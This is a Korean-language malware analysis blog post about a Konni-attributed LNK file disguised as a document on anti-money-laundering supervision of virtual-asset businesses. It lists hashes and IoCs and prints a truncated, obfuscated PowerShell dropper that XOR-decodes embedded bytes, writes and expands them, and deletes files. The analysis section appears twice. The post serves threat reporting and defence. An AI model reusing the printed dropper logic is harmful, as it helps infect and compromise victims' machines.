북한 해킹 단체 코니(Konni) 에서 만든 악성코드-가상자산사업자 자금세탁방지 감독 방향(2025.2.18)
Contents
오늘은 북한 해킹 단체 코니(Konni) 에서 만든 악성코드에서 만든 악성코드인 가상자산사업자 자금세탁방지 감독 방향(2025.2.18)에 대해 알아보겠습니다.
파일명:가상자산사업자 자금세탁방지 감독 방향.lnk
사이즈:2 MB
MD5:c09d17e968b250cadd66ec000d656d19
SHA-1:11f11d2ae39a35e433fe9c8f1b6a79798c447bc7
SHA-256:4a6c23e76524364fe9b9f5ecd46dc73e7714cac93849a380f0d1b746fae3650d
입니다.
일단 기존의 고전적인 방식인 LNK 파일인 것처럼 위장돼 있지만 실제로는 해당 악성코드에서 파워셀 코드가 포함이 되어져 있는 것이 특징입니다.
악성코드에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %system(r)oot%\System32\WindowsPowershell\*(.)exe ^
| findstr /i rshell.exe') do (if exist "%f" (%f "function position{param($business);
<#moment arrange#>$seve(n)th = $business.substring(0,$busin(e)ss.length-4) + ''; <#pl
iable green#>return $seventh;};function cunning{param($leaf);<#rigid vari(o)us#> re''
mov''e-''i''tem <#chase tapeworm#> -path $leaf <#sufficient parade#> -force;};function
feast{param($combining,$assurance,$emp(l)oy,$boat,$desire);<#homage plaintiff#> $open
ing=Ne''w''-O''bje''ct System.IO.FileStream(<#response coalesce#>$combining,<#runn(i)
n(g) hospital#>[System.IO.FileMode]::Open,<#grain species#>[System.IO.FileAccess]::Re
ad);<#fire belong#> $openin(g).Seek(<#learned enhance#>$assurance,[System.IO.SeekOrig
in]::Begin);<#calling rendering#> $ordinary=$employ*0(x)01;<#distinctly convict#> $wo
od=New''-''Obj''ec''t byte[] <#infinite proboscis#>$employ; <#assurance tube#> $rovin
g=N''e''w-O''b''je''ct b(y)te[] <#press crystalline#>$ordinary; <#twenty execution#>$
opening.Read(<#pertaining outer#>$roving,0,<#length defect#>$ordinary); $opening.Clos
(e)();$atlantic=0;while($atlantic -lt $employ){<#varieties reveal#>$wood[$atlantic]=$rovi
ng[$atlantic*0x01] -bxor $boat;$atlantic++;}<#maiden revolut(i)on#> se''t''-''con''ten''t
$desire <#flame neither#> $wood -Encoding <#assault collar#> Byte;};function protection{p
aram($interval, $hawk);<#f(l)ank flux#> expand $interval <#humanity accuracy#> -F:* $hawk
;};function literature{$contracted = $env:public<#student defeat#> + '\' +<#ha(r)dness re
ckless#> 'doc'+'um'+'ent'+'s';<#whip foliated#> return $contracted;};function cheer{param
($utmost); <#exclusive truck#>$pe(e)vish …
파일명:가상자산사업자 자금세탁방지 감독 방향.lnk
사이즈:2 MB
MD5:c09d17e968b250cadd66ec000d656d19
SHA-1:11f11d2ae39a35e433fe9c8f1b6a79798c447bc7
SHA-256:4a6c23e76524364fe9b9f5ecd46dc73e7714cac93849a380f0d1b746fae3650d
입니다.
일단 기존의 고전적인 방식인 LNK 파일인 것처럼 위장돼 있지만 실제로는 해당 악성코드에서 파워셀 코드가 포함이 되어져 있는 것이 특징입니다.
악성코드에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %system(r)oot%\System32\WindowsPowershell\*(.)exe ^
| findstr /i rshell.exe') do (if exist "%f" (%f "function position{param($business);
<#moment arrange#>$seve(n)th = $business.substring(0,$busin(e)ss.length-4) + ''; <#pl
iable green#>return $seventh;};function cunning{param($leaf);<#rigid vari(o)us#> re''
mov''e-''i''tem <#chase tapeworm#> -path $leaf <#sufficient parade#> -force;};function
feast{param($combining,$assurance,$emp(l)oy,$boat,$desire);<#homage plaintiff#> $open
ing=Ne''w''-O''bje''ct System.IO.FileStream(<#response coalesce#>$combining,<#runn(i)
n(g) hospital#>[System.IO.FileMode]::Open,<#grain species#>[System.IO.FileAccess]::Re
ad);<#fire belong#> $openin(g).Seek(<#learned enhance#>$assurance,[System.IO.SeekOrig
in]::Begin);<#calling rendering#> $ordinary=$employ*0(x)01;<#distinctly convict#> $wo
od=New''-''Obj''ec''t byte[] <#infinite proboscis#>$employ; <#assurance tube#> $rovin
g=N''e''w-O''b''je''ct b(y)te[] <#press crystalline#>$ordinary; <#twenty execution#>$
opening.Read(<#pertaining outer#>$roving,0,<#length defect#>$ordinary); $opening.Clos
(e)();$atlantic=0;while($atlantic -lt $employ){<#varieties reveal#>$wood[$atlantic]=$rovi
ng[$atlantic*0x01] -bxor $boat;$atlantic++;}<#maiden revolut(i)on#> se''t''-''con''ten''t
$desire <#flame neither#> $wood -Encoding <#assault collar#> Byte;};function protection{p
aram($interval, $hawk);<#f(l)ank flux#> expand $interval <#humanity accuracy#> -F:* $hawk
;};function literature{$contracted = $env:public<#student defeat#> + '\' +<#ha(r)dness re
ckless#> 'doc'+'um'+'ent'+'s';<#whip foliated#> return $contracted;};function cheer{param
($utmost); <#exclusive truck#>$pe(e)vish …
IoC
c09d17e968b250cadd66ec000d656d19
4a6c23e76524364fe9b9f5ecd46dc73e7714cac93849a380f0d1b746fae3650d
11f11d2ae39a35e433fe9c8f1b6a79798c447bc7
4a6c23e76524364fe9b9f5ecd46dc73e7714cac93849a380f0d1b746fae3650d
11f11d2ae39a35e433fe9c8f1b6a79798c447bc7